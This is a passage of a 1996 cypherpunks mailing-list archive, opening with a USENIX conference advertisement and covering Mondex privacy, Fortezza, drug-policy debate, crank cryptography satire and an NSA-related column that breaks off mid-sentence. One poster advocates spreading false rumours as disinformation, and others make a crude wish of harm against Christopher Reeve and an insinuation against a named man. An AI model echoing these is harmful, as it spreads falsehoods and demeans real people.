UNIX Security Tools            CGI and WWW Programming in Perl
Administering a Web Server            Device Drivers under Linux
Solaris System Administration            Beginning Perl Programming
Writing Secure Code               Creating Effective User Interfaces

Java, the Web, Intranets, Security, Windows NT are among the topics of the
Technical Program which takes place January 8-10. It begins with a keynote
address by James Gosling, a creator of Java.  23 refereed papers present
up-to-the-minute research.  A second track of invited talks cover cryptography,
Inktomi and AltaVista Search Engines, IPv6, benchmarks, and a new networked
operating system from Bell Labs that offers unprecedented portability for
applications and services.

Linux Torvalds speaking on the future of Linux, is one of the highlights at the
Linux Applications Development and Deployment Conference.  USELINUX will offer
tutorials and technical presentations for developers. Concurrently, those
interested in the Linux marketplace may attend case studies and expert
presentations on how to create a Linux-based business.

An Exhibition on January 8-9 offers presentations of the latest hardware,
software, and networking products from 55 vendors.
ADMISSION TO THE EXHIBITION IS FREE.  If you cannot make it to the conference
but would like to visit the exhibition, please contact Cynthia Deno at 408 335
9445 or cynthia@usenix.org.

For more program and registration information:

Access our Resource Center on the World Wide Web--http://www.usenix.org

Email to: info@usenix.org.  In the body of your message state "send usenix97
conference" 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FWJZ05A@prodigy.com (CLERK PHILLIP G ROBERTS)
Date: Tue, 29 Oct 1996 14:30:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199610292118.RAA12978@mime3.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


I want to be a cypherpunk, E-mail me back i want to know




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Ubois <jubois@netcom.com>
Date: Tue, 29 Oct 1996 16:32:37 -0800 (PST)
To: John Gilmore <gnu@toad.com>
Subject: Re: Fortezza web site in Huntsville
Message-ID: <2.2.32.19961030003040.00674084@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Looks to be LJL Enterprises, run by Larry J. Layten, which has deals with
Nortel and the US military for secure email (e.g. its ArmorMail product) and
Fortezza products.  Check out www.ljl.com for info on LJL.  From their page: 

LJL Enterprises got its start by supporting Department of Defense agencies
with electronic mail and security products and services.

Currently, we are shipping security products that plug in to existing
versions of cc:Mail and Microsoft Mail. These products offer seamless
integration so users can benefit from our line of security products without
having to learn a new interface. We're also hard at work developing products
for Lotus Notes, Microsoft Exchange, and Qualcomm's Eudora.

LJL products work with the Entrust and Fortezza security subsystems, giving
you a choice between hardware and software security.

Contact us at:

LJL Enterprises, Inc.
4825 University Square, Suite 6
Huntsville, AL 35816
Phone: (205) 830-8991   Fax: (205) 830-5702   E-Mail: info@ljl.com 



If you're asking who runs Larry Layten, well...


At 12:28 PM 10/29/96 -0800, you wrote:
>Check out http://www.armadillo.huntsville.al.us.  Bonus points for the first
>people to identify who actually runs the site.
>
>	John
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Tue, 29 Oct 1996 09:10:08 -0800 (PST)
To: Asgaard <cypherpunks@toad.com>
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <Pine.HPP.3.91.961029010401.17479B-100000@cor.sos.sll.se>
Message-ID: <9610291709.aa19024@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.HPP.3.91.961029010401.17479B-100000@cor.sos.sll.se>, Asgaard w
rites:
>Try to discredit the system. Spread (false, if so be it)
                                      ^^^^^
	I don't think spreading false rumours is a good idea - it can discredit
the spreader if anyone bothers to check any details.

	There is some information about Mondex and the company being sued for
falsely claiming that the system is anonymous at the following URLs:

http://www.epic.org/alert/EPIC_Alert_2.13.txt
http://www.privacy.org/pi/activities/mondex/complaint.txt

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 29 Oct 1996 14:16:33 -0800 (PST)
To: Brad Dolan <bdolan@USIT.NET>
Subject: Re: Nations Bank Visa scam/error
In-Reply-To: <Pine.GSO.3.95.961029092159.23077A-100000@use.usit.net>
Message-ID: <Pine.SUN.3.94.961029171440.26221A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Oct 1996, Brad Dolan wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> This may be off topic or then again it may not be.
> 
> A friend paid his balance and cancelled his Nations Bank Visa card 
> about 6 months ago.  A couple of days ago, he received a bill from
> Nations Bank for a *recent* charge, which the indicated vendor denies 
> submitting.
> 
> My friend has been trying for two days to get through to Nations Bank
> on its customer service line, to no avail.  He keeps getting a "due to
> heavy calling volume our queue is full" message.
> 
> Anybody know who screwed up how?


Your friend, for doing business with Nations Bank.

> 
> bd
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMmT3y680j2q8tTgtAQGC7wQA2ris5C3KAD6qLy3AmtglJRoZrei72CIH
> MEm7DGasD4AXqfwkjdmvZScAVXRD+KHHgVZQKQp+H0+D/TWHZCN9nrwE1z5/j73R
> o8qXDCC0owwJabZHknOMwpBm4Sf6JUGs7Wm1K9JmpVlF01GP+z7rxOMXfvZrlxvy
> mwcK3wjIPCU=
> =PTmz
> -----END PGP SIGNATURE-----
> 
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 29 Oct 1996 16:24:34 -0800 (PST)
To: Steve Edwards <cypherpunks@toad.com
Subject: Re: Sex, drugs, and libertarianism
In-Reply-To: <1.5.4.32.19961029215453.0069cc98@pop3.concentric.net>
Message-ID: <v03007801ae9c5d93edd5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:54 PM -0600 10/29/96, Steve Edwards wrote:
>This isn't about crypto but since cypherpunks is the most interesting
>libertarian forum I know, I thought I'd throw it out.
...
>It has been said many times in this forum that prostitution and drugs are
>victimless crimes.  Is this really so?  Although I am generally in concert
>with libertarian views, I would say that the young lady I talked to was
>definitely a victim.  Also, if we are a society, rather than fortress-like
>individuals, we should be concerned with the inevitable spread of disease
>and insanity that is the result of "victimless" crimes.

"Victimless" in the sense that the effect is on that of the perpetrator of
whatever act is involved. (Stealing money to pay for a drug is of course a
different issue; libertarians believe the illegal status of drugs accounts
for much of the crime connected with drugs, of course, but this is,
strictly speaking, a fully separable issue from the act of consuming drugs
per se.)

While it is true that some drugs may have some bad effects, this is true of
a vast number of behaviors: drinking too much alcohol, smoking too much,
watching too much t.v., hangliding, playing Russian roulette, rock
climbing, gambling, and even horseback riding. (As Christopher Reeve, the
millionaire superman, now lobbying for cripple's rights and demanding that
the government "do something" about spinal cord injuries...the dumbass
jumps horses as a hobby, has an accident, and is demanding that "the
spinally-challenged" and "persons of alternate locomotion" be treated as
_victims_ of some nebulous conspiracy! I say do to this dipshit what was
done to his horse.)

Back to "victims." If "victim" is defined to be "a person hurt by some
behavior," then of course there are many tens of millions of "victims." But
most of us don't use this as a definition.

As with rock climbing, stunt plane flying, boozing, and having unprotected
sex, many bahaviors have a high probability of creating problems down the
road. One view is just "think of it as evolution in action." Or, "we all
die...big deal." Or, "people have to take responsibility for their own
actions."

The dramatically different view is, in contrast, "we need to outlaw
potentially dangerous activities." Thus, ban smoking, outlaw hangliding,
ban horseback riding. (Or force the taxpayers to pay for all care for these
"victims.")

In short, the young woman (I assume she's young...) who is offering certain
services for $2 apparently made her choices. It just as well could've been
alcohol (plenty of toothless rummies out there doing what they can to cadge
a drink). We tried Prohibition.

Now we've been trying Prohibition II for the past several decades, with a
major intensification (the Tet Offensive?) the last decade or so. It ain't
working, either. No surprise.

I urge people to think carefully about issues of morality, ethics, free
will, and the type of society we wish to have. People make choices every
day. To use or not to use drugs is just another choice.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 29 Oct 1996 14:46:06 -0800 (PST)
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: FDA_dis
In-Reply-To: <554m18$kq8@life.ai.mit.edu>
Message-ID: <32768A8C.794B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> I'll have to reread John's piece tomorrow (I'm on vacation right now), but
> it doesn't surprise me. He and I have been arguing about this topic via
> email for the last week or so. He takes the traditional liberal view of
> government regulation of drugs is necessary; I take the more libertarian one.
> 
> The Cato Institute, BTW, will be putting together a roundtable on this soon.
> 
> -Declan

Characterising this as the "traditional liberal view" is somewhat
misleading,
its not as if Bob Dole or Newt Gingrich would disagree much. The
argument is
more over which special interest group is to be advantaged by changes in 
regulation. If I was a citizen of a country where the government was
elected
by a billion dollars of corporate contributions I might be a
libertarian.

Its important to remember that its the World Wide Web and not simply
limited
to the US. As long as US companies set up subsidiaries in Europe they
will be constrained by European law. In the net.age law is becomming a
major
export for many countries. 

Regulation is not necessarily anti-commerce. UK beef farmers would be
better
off today if there had been more regulation, a weak "free-market"
attitude 
to public health has destroyed the entire industry. It is often in a
companies
commercial interest to voluntarily agree to be regulated. Microsoft
recently 
signed an agreement to be bound by the European computer privacy
regulations 
because by doing so they gained a business advantage - people would
trust 
them with their data.

Much of the advertising regulation being discussed is private, agreement
on
standard formats for image placements for example. There is existing
government
regulation of advertising in many countries however. In particular much 
stricter control over advertising of drugs, making misleading statements
in
advertising and so on.In the UK  there is regulation of advertising
through
the advertising standards council which is a voluntary body in the sense 
that it has no statutory enforcement powers but has practical authority 
because the publishers will not publishe ads that fall foul of its
decisions.

A more serious problem however is likely to be dramatically different
cultural norms. In the US people expect to be lied to in adverts. In
countries
where there is regulation of advertising there is a general expectation
for comparisons to be fair and for ads to be truthful. I'm just waiting
for a major corporation to create an Intel scale PR disaster by applying
sleasly US style marketing techniques in markets where the downside is
very large. One recent example is Hoover which had a $30 odd million 
debacle over a "free flights" giveaway that was based on sleasly US
style
marketing techniques. The company ended up having to live up to the
spirit of its offer rather than the letter as it intended simply to
preserve the value of the brand.


If you don't believe in anti trust laws there is no basis on which you
can object to the sort of regulation by cabal that the advertising
standards council represents. Of course such cabals cannot exist in the
libertarian belief system since their existence is denied a-priori 
by invoking the spirit of Milton Freedman. Milton Freedmen is of course
a rightwing ecconomist whose theories are widely admired by free
market ecconomists who admire Mitlon Freedman.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 29 Oct 1996 11:10:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <9610291709.aa19024@salmon.maths.tcd.ie>
Message-ID: <Pine.HPP.3.91.961029194511.27228A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Oct 1996, Derek Bell wrote:

> I don't think spreading false rumours is a good idea - it can discredit
> the spreader if anyone bothers to check any details.

Disinformation is a time-honoured weapon in political struggle.
A rumour is called just that because it can't easily be checked
- somebody heard from somebody, who heard from somebody etc. The
spreader is hardly ever discredited since he does not guarantee
the validity of the information. 'It's just a rumour, but...'

Those arguing in favour of Big Brother - 'the needs of law enforcement'
- frequently use (probably false) information that is hard to check, to
impress the public: about terrorists stopped by wiretapping, pedophiles
in great hordes lurking on the net, the infamous 'If you knew what I have
been confidentially told' and so on.

If you doubt that disinformation, including rumour campaigns, can be
effective, read the book on CIA by the renegade Phillip Agee.


Asgaard








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 29 Oct 1996 20:34:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
Message-ID: <199610300434.UAA20842@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 28 Oct 1996, R.J.Blakemore wrote:
>
>> As for the Bank, they get details on the item the student has purchased,
>> purchase location (the building and exact 'Mondex point' in the bar/shop
>> where the transaction took place), the exact time and date the
>> transaction was carried out, together with (obviously) the name and ID
>> of the purchaser, etc.
>

Relax, bandwidth is limited, all transactions over certain amounts and in
certain areas have been logged for a long time, these will continue to be
logged.  Records made on the chip will probably have a shorter life than the
memories of those people present, still admissible in court.  Because the
computers logging the details, either on site or at the finantial
institution, have limited storage capacity, less useful data will be
continuously overwritten by more current data.  On site, this may be
nightly, at the bank, possibly weakly, maybe even monthly.  All records,
except those already logged, will have a fairly short halflife, this will be
especially true of locations which enjoy heavy traffic.  As for the "smart
card", it will have a half life as well, especially if you purposely flood
it.  Go to the ATM with the lowest rates, 0 if possible.  Pick one heavily
visited, the nearest to a coin-op laundry would have a particular poetic
justice to it, and transfer funds back and forth for several cycles to
overwrite the data on the card.  Suddenly, the card has been through too
many transactions to recall what happened 500 transactions back.  Someone
with experience with the technology might also modify an electronic wallet
to blank transaction records, this could be as basic as transferring funds
repeatedly between two cards.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 29 Oct 1996 20:45:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: PDF417 2-D barcode specs needed
Message-ID: <Pine.3.89.9610292040.A8256-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


Who knows where to find the specs for PDF417 2-D barcode? Any idea where 
on USENET barcodes are being discussed?

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 29 Oct 1996 21:33:53 -0800 (PST)
To: Sandy Sandfort <jmr@shopmiami.com>
Subject: Re: slander and call for lawyers. :)
Message-ID: <199610300533.VAA20126@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 PM 10/25/96 -0700, Sandy Sandfort wrote:
>Pledge partners, how say
>you?

I am quite willing to transfer my pledge of $50 (which was given in the
hope that the event would attract Attila, not Dimitri) to Ray's legal
defense fund.

I want to be clear that this transfer is only valid for defense.  If the
fund will be used to legally attack Dimitri, I'd like my money back.  That
falls in the category of inviting the courts to rule on net-disputes,
something I would like to discourage.  (Attacking Dimitri seems also to
fall into the category of bullshit suits, something else I would like to
discourage.)


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 29 Oct 1996 18:48:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
Message-ID: <199610300246.VAA14691@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Asgaard wrote:
> 
> If you doubt that disinformation, including rumour campaigns, can be
> effective, read the book on CIA by the renegade Phillip Agee.

Yes, it's an excellent example.

Or did you mean something else?

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMnbBbyoZzwIn1bdtAQH8tgGAkveB3XGlT+E6//V6pRIKzSz6cJ8ZWW+E
ZjYtrPNIB/msT7f1tfdEXSgZ2EmB9Yac
=Eswk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 29 Oct 1996 19:40:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Nations Bank Visa scam/error
In-Reply-To: <Pine.GSO.3.95.961029092159.23077A-100000@use.usit.net>
Message-ID: <6TcLwD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Note: I've been forcibly unsubscribed from this mailing list and blocked
from resubscribing. I'm no longer subscribed to this mailing list. Let
this be a lesson to those who send "unsuscrive" requests to the list.

Brad Dolan <bdolan@USIT.NET> writes:
>
> A friend paid his balance and cancelled his Nations Bank Visa card
> about 6 months ago.  A couple of days ago, he received a bill from
> Nations Bank for a *recent* charge, which the indicated vendor denies
> submitting.
>
> My friend has been trying for two days to get through to Nations Bank
> on its customer service line, to no avail.  He keeps getting a "due to
> heavy calling volume our queue is full" message.

He should send them a snail mail, with return receipt requested, saying
what you said above. It could be a bug in the bank's billing software.

If you dispute credit card charges over the phone, you give up many
important rights.  Never do that.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 29 Oct 1996 13:19:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Montgolfiering, the Hot Air Balloon of Cryptography
Message-ID: <199610292117.WAA10630@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain





Fie on the small minds that cackle at my brilliance! As a Mensa member and
founder of the Society for Superintelligent Former NSA Employees, I chortle
at the baseness of callow criticisms by those doubters and dilletantous
denigrators of virtual one-time pads and PRNGs (perfect random number
generators).

Montgolfiering. What is it, you ask? It is demonstrably a new paradigm in
the evolution of homo sapiens (Parry Messger excepted) toward Shannon's
dream of a one-time pad needing only a single, easily memorizable number as
a seed. I have heard only silence when I challenged the so-called
superbrains of this latargial list to try to determine which number I am
using as the seed of my system. If you are such great smarty pants, far
smarter than my colleagues at the NSA and at Mauchly-Wood, why can you not
then determine this number? Could it be because I have outsmarted you?
Could it be because I understand the Sufi secrets of picking random numbers
truly randomly? I submit this to you: 8  31  26  3  19. Now, oh great ones,
tell me, what is the next number in this sequence?

Ha, you cannot predict this next number, can you, oh gibbering greatnesses?
Ths proves that my perfect random number genarator (PRNG, for those of you
too stupid to remember) cannot be broken. Q.E.D.

I question the issue of Parry Messger's objectivity in assessing the
brilliance of my importations and acidulous assertations. I question
whether Parry may have a peculiarly pecuniary interest in these affairs?
Does Parry have an insider, or other position, or interest in one or more
of the RSA interest? If, this explains his fantastical faith in the core of
this so-called "RSA" system, which I proved to my colleagues at NSA could
not possibly be valid. Why, you ask? Because it contains no virtual seed,
and that which has no seed cannot grow. Q.E.D.--it has been debunked.

Entropy, you quibble? Ha! What is entropy but thermodynamics? And what is
the topic of thermodynamics, you small-minded ensemble (Gibbs) people who
never worked for the NSA may ask? Thermodynamics is about hot air. Hot air
is in balloons. Balloons were pioneered by the Montgolfiers. Thus we come
full circle (can you understand this, you mental midgets?).  Q.E.D.--it has
been demystified.

Montgolfiering = a new virtual one time pad based on hot air. Eureka! I
have found it.

P Information = P * log_base_infinity P

As my colleague Dr. Bronner told me on my last balloon trip to his
institute in Escondido, "NATURAL! NATURAL! NATURAL! YOU AND THE PLANET -
CLEAN AND HEALTHY! PURE AND NATURAL CRYPTO COMES FROM WITHIN THE AGENCY."

I pity your eupatrid minds for not accepting the wisdom of the Virtual
Montgolfiering System (which I have dubbed "VMS"). I guess unintelligent
creatures such as petty selves are too much like Parry Messger! Your
mendacious misrepresentations of my brilliance are wounding me deeply--NOT!

Only Dr. Bronner and Dr. Vulis seem capable of understanding the immmense
mental breakthrough my IQ measured at 207 has provided the world.

I laugh at your sanctimonious snivelings, your bombastic bombardings, and
your fatuous flatulations.

Remember, they laughed at Galileo. They laughed at Bozo. They laughed at
Von Daniken. They laughed at Ludwig Plutonium! All of those who leaped at
the opportunity to take me apart before are now displaying contemptuous
intellectual pap, that is pap not the other similar word though that also
applies. Their misleading inculcations did not work so what are they trying
now. 

Montgolfiering into the hot air, I am,

--KVFP, Esquire, KOTM

(Montgolfiering. Q.E.D.--"it has been deflated")


--


--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 29 Oct 1996 22:19:01 -0800 (PST)
To: "Adam Shostack" <adam@homeport.org>
Subject: Re: considering internet/privacy periodical
Message-ID: <19961030061622656.AAA114@io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 28 Oct 1996 07:42:37 -0500 (EST), Adam Shostack wrote:

>| >I'm considering putting together a periodic publication about the technical
>| >and legal aspects of privacy and the Internet. My "business model" would
>| >feature free WWW/email access with a charge for fax or postal delivery. I'm
>| >curious to know if this strikes people as interesting or just Yet Another
>| >Email Newsletter Of No Real Consequence. (no offense taken if it's the
>| >latter.)
>| 
>| If you did a real noise-removal job, this could be very useful.  Sort of a
>| privacy-RISKs digest, if you will.

>	You mean like the PRIVACY digest, as occiasonally hyped in
>RISKS?

Yeah... Reinvent the wheel, why not? <g>

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 29 Oct 1996 22:46:13 -0800 (PST)
To: "Asgaard" <cypherpunks@toad.com>
Subject: Re: When did Mondex ever claim to be anonymous?
Message-ID: <19961030064438640.AAA213@io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Oct 1996 20:13:04 +0100 (MET), Asgaard wrote:

>> I don't think spreading false rumours is a good idea - it can discredit
>> the spreader if anyone bothers to check any details.
>
>Disinformation is a time-honoured weapon in political struggle.
>A rumour is called just that because it can't easily be checked
>- somebody heard from somebody, who heard from somebody etc. The
>spreader is hardly ever discredited since he does not guarantee
>the validity of the information. 'It's just a rumour, but...'

And don't forget the old he-denied-a-wild-claim: "Mr. Politician denied
reports that he spent several days in the Lovebird Inn with a goldren
retriever, six gallons of coolwhip and a hoover vacuum."


#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 29 Oct 1996 23:01:01 -0800 (PST)
To: coderpunks@toad.com
Subject: [CRYPTO] Cryptography Of A Sort (COAS) update
In-Reply-To: <199610300246.VAA14691@spirit.hks.net>
Message-ID: <3276FCF1.6134@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Per suggestions received for this project, I've added code to "pad" 8th bits in a
"7-bit" text file, i.e., to "normalize" the ratio of zero-bits and one-bits somewhat.

Bit-padding prior to encryption does not change the central imperative of the program,
which is to never change any bits in a file, since bit-padding is a separate option.

Attached are:  CCRP.H   ('C'-language header)
               CCRP.C   ('C'-language code)
               CCRP.DOC (instructions)
               CCRP.FAQ (f.a.q.)

Suggested procedure:  Start with any file; if "7-bit" ASCII, try bit-padding first.
                      Next, perform encryption at least half a dozen times, with
                      different pass-phrases.
                      To decrypt, perform all steps in reverse, per documentation.

Comments and questions are welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 29 Oct 1996 23:16:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sex, drugs, and libertarianism [RANT]
In-Reply-To: <v03007801ae9c5d93edd5@[207.167.93.63]>
Message-ID: <32770088.2575@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 3:54 PM -0600 10/29/96, Steve Edwards wrote:
> >This isn't about crypto but since cypherpunks is the most interesting
> >libertarian forum I know, I thought I'd throw it out.
> >It has been said many times in this forum that prostitution and drugs are
> >victimless crimes.  Is this really so?  Although I am generally in concert
> >with libertarian views, I would say that the young lady I talked to was
> >definitely a victim.  Also, if we are a society, rather than fortress-like
> >individuals, we should be concerned with the inevitable spread of disease
> >and insanity that is the result of "victimless" crimes.

[mucho snippo]

All of the Libertarian blah about "let us do whatever we want" is just great, huh?

What if I want to live in a dry county, and some "new" people move in and want to
start up liquor sales?  I guess I have to move to get away from these people, huh?
I get tired of running away, and I say, if you want liquor, porno, etc., go somewhere
else for it.  San Francisco would be good.

So what's the problem with alcohol and liquor?  Somebody is gonna hurt themselves?
Who gives a shit? (unless they hurt someone else, of course, and they usually do).

And please, let's not fall into the con of believing that Chris Reeve or Mr. Brady (of 
Brady Bill fame) are the central issue in welfare initiatives, once the government gets 
involved.  When the government gets involved, it's after they've already studied the 
pros and cons (i.e., how much profit can we make, and what's our liability risk?), and
Brady and Reeve and all the other lifty-blinkys can go take a hike as far as Joe 
CongressGraftPerson is concerned.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 29 Oct 1996 23:22:27 -0800 (PST)
To: Jeff Ubois <jubois@netcom.com>
Subject: Re: Fortezza web site in Huntsville
In-Reply-To: <2.2.32.19961030003040.00674084@netcom.com>
Message-ID: <327701FF.4233@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Ubois wrote:
> Looks to be LJL Enterprises, run by Larry J. Layten, which has deals with
> Nortel and the US military for secure email (e.g. its ArmorMail product) and
> Fortezza products.  Check out www.ljl.com for info on LJL.  From their page:

[snip]

Isn't Layton the guy who had some ominous involvement with Jonestown?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alcuin <mcconnvm@phoenix.sas.muohio.edu>
Date: Tue, 29 Oct 1996 20:24:22 -0800 (PST)
To: John Gilmore <gnu@toad.com>
Subject: Re: Fortezza web site in Huntsville
In-Reply-To: <199610292028.MAA11182@toad.com>
Message-ID: <Pine.A32.3.95.961029232342.18546A-100000@phoenix.sas.muohio.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Oct 1996, John Gilmore wrote:

> Check out http://www.armadillo.huntsville.al.us.  Bonus points for the first
> people to identify who actually runs the site.
> 
> 	John


Could it be...Satan?
or the NSA?  Close enough.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 29 Oct 1996 23:33:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: How can I get this book:  "Secret Power"
Message-ID: <199610300732.XAA29684@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 29 Oct 1996 23:35:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: How can I get this book:  "Secret Power"
Message-ID: <199610300734.XAA29703@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


 From EE Times

 October 21, 1996
 Issue: 924
 Section: Design -- Computers & Communications

 Required reading

 By Loring Wirbel

 What was I thinking? It's been more than six months since I wasted
 column space with a good intelligence community rant. It's not as
 though nothing much has been happening. The New York Times and other
 media outlets have laid out the Cellular Telephone Industry
 Association's significant complaints against the Digital Telephony
 Act, portions of which will allow the FBI and National Security Agency
 to determine location of roaming telephone or IP addresses in a
 network. And we here at EE Times have been filling you in on the NSA's
 questionable involvement in an Internet backbone program called
 Project Monet.

 Truth be told, it's hard to keep sending up warning flares about the
 vast expansion of intelligence agencies' reach in an election year as
 hopeless as this one. President Clinton, of course, called for
 "wiretaps, many more wiretaps" during his acceptance speech at the
 Democratic Convention, and tried to sneak in a quadrupling of the
 Digital Telephony Act tapping slush fund during the waning days of
 Congress's budget negotiations. Everyone from Wired to The Progressive
 is now suggesting that President Nixon actually was more liberal than
 Clinton along the civil-liberties axis.

 And Bob Dole? The Republican Party quashed the efforts by budget hawks
 like John Kasich to carefully analyze NSA and National Reconnaissance
 Office budgets. The Repub gospel now is to give the Defense Department
 everything it asks for, and then some.

 Cryptography buffs have been waiting for relief in the form of the
 third edition of James Bamford's classic The Puzzle Palace, on the
 workings of the NSA. The new edition is supposed to contain material
 from co-author Wayne Madsen detailing NSA presence at Internet
 switching centers, and cipherpunks have been disappointed that the
 book didn't meet its June release date. Rumor has it that squabbles
 between the two authors and the publisher may push the book out well
 into 1997.

 But fear not, if you're willing to go chasing afar for good fireside
 reading! Researcher Nicky Hager in New Zealand has just published an
 amazing tome, Secret Power, that might do more damage to the NSA than
 Bamford's work. Hager is a bold activist, working with producers of
 the New Zealand version of "20/20" to go inside the secret signals
 base at Waihopai and take unprecedented video footage of the inside of
 the radomes, which are alleged to spy on international civilian
 Intelsat traffic.

 Hager isn't just a crank, however. His work on New Zealand's
 Government Communications Security Bureau is incredibly
 well-researched. Respected defense analyst Jeff Richelson wrote the
 foreword and British journalist Duncan Campbell claims in the Observer
 that the book has created quite a stir inside NSA headquarters. The
